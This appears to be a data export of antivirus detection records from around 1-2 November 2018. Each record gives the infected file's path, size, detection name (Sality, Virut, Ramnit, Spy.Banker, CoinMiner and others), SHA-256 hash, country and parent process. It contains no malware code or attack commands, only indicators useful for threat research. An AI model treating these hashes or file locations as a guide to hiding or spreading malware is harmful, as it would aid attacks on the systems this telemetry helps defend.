  Row(detection=Row(filename='avscan-20181102-053321-c815280b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053321-C815280B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053703-4c0dcd73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053703-4C0DCD73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062408-e04f2ed8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062408-E04F2ED8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052523-ab5059fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052523-AB5059FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055904-5f785dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055904-5F785DAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053759-6d8598df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053759-6D8598DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053905-9500c7a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053905-9500C7A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062109-751e18ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062109-751E18AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051214-d4d4ae53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051214-D4D4AE53', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fav3.exe', filepath='D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='234902741324690.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\234902741324690.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155346-ab24a078', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155346-AB24A078', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160115-f6c3b45d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160115-F6C3B45D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T17:18:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180505-6c8d2013', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180241-528F9759\\AVSCAN-20181101-180505-6C8D2013', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:05:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-222910-bb65f0f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_84a79d53\\AVSCAN-20181031-222751-B47B10EB\\AVSCAN-20181031-222910-BB65F0F2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhb3da.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHB3DA.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:37:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ความทรงจำ.exe', filepath='E:\\picture\\ความทรงจำ\\ความทรงจำ.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='30d4781f4428aa4ab1ce7c166165988d445e4b8ed8559cc485721a90eb5fbe7f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T14:22:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='z-enemy.exe', filepath='\\\\?\\C:\\mining\\z-enemy-1.22_x32\\z-enemy.exe', filesize=13120000, name='HEUR/AGEN.1033252.#M1.#R1'), hash='2fceedab18e5468969fc4112ba2f5b78caf66cbaa0db75bf9779955a54076c32', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:56:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jalan lpa.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\ALL Data LPA\\surat jalan LPA\\jalan LPA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diffupdater.exe', filepath='C:\\Program Files\\Canon\\Auto Update Service\\DiffUpdater.exe', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='035ae9c78f8b49cfda986c1a83d5f42f3f9efcf0c3c2559a91c2b778668f2d20', metadata=Row(cmdline='\\\\\\/view=wipe-folders', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\TuneUp Utilities 2008\\Shredder.exe', parentsize=170240, timestamp='2018-11-01T20:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T02:43:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:11:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:01:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160327-0d252858', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160327-0D252858', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  APRIL. 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='505c78d19bc0960b1f578443823ed3778952c67696f28e4b524f9f4b7f8c4ef4', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T14:59:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='số liệu hệ người  nghiện đến tháng 10.2018.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Số liệu hệ người  nghiện đến tháng 10.2018.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8515fb47c385fe17a5c97cfda5fc0b26f97b7c7b1c8e444d9af2c70bfb862c33', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskeng.exe', filepath='C:\\Windows\\System32\\taskeng.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='baae1a15dd2715e61d17b9832c85d3fe77674867157c467655041e945908fee4', metadata=Row(cmdline='-k netsvcs', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:44:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111801-2febf9bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111801-2FEBF9BB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164533-4ce279af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-164533-4CE279AF', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:45:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012017-14aef1fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012017-14AEF1FD', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nscBA2D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T01:27:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hddvdengine.dll', filepath='C:\\Program Files\\Common Files\\Ahead\\Lib\\HDDVDEngine.dll', filesize=2048000, name='W32/Ramnit.CD.#M1.#R1'), hash='8943f7878c9ca225b2243ff95e24691fbf88ff57a1138bb522c3a144e47d21e0', metadata=Row(cmdline='--engine=2 --session-id=JT8xt\\\\\\/\\\\\\/xpTJIIbi0cGjs\\\\\\/bYvVFeRc8CMQNQS7rQz --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\32.168.200\\software_reporter_tool.exe', parentsize=12408440, timestamp='2018-11-01T12:16:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9653554c59f3a7a927926b6f783cde4e7f90afe22e988ab926b446d89384ce84', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\9653554C59F3A7A927926B6F783CDE4E7F90AFE22E988AB926B446D89384CE84', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9653554c59f3a7a927926b6f783cde4e7f90afe22e988ab926b446d89384ce84', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='89b490ad7574511ddc2962f56c95b893.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1071369123\\89b490ad7574511ddc2962f56c95b893.smp', filesize=1000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='5c108c7200ec6307dce63d56274d5a7035adbbd7dcef33827e7c9cc71d7a26c9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-01T19:26:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210424-4ab4b45d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210424-4AB4B45D', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111117-fcf165c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111117-FCF165C5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110724-df97d1bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110724-DF97D1BB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013105-ed1a5749', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_860149a1\\AVSCAN-20181102-013008-E1F1B96F\\AVSCAN-20181102-013105-ED1A5749', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='563533b036cd484ca3af0db629eb68d687a7e065d3bd5eb236ec6825fb1198ce', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193741-d3e150cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_672ae94a\\AVSCAN-20181101-193601-C844F63F\\AVSCAN-20181101-193741-D3E150CD', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='b63fc62de0e3ebee613d119c2b50e30f7adc7e50e0a45047f7f0cdb710bf27b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\D:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='544dde8c316c6602a65d70e5a767b16442ceb187595c91b4ebf191ae096abd45', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T16:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-022112-0394fd84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd5703d2\\AVSCAN-20181101-022102-0126B875\\AVSCAN-20181101-022112-0394FD84', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:21:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cache.exe', filepath='G:\\dexati\\collagephoto\\cache.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:50:31Z'), dt=datetime.date(2018, 11, 1)),
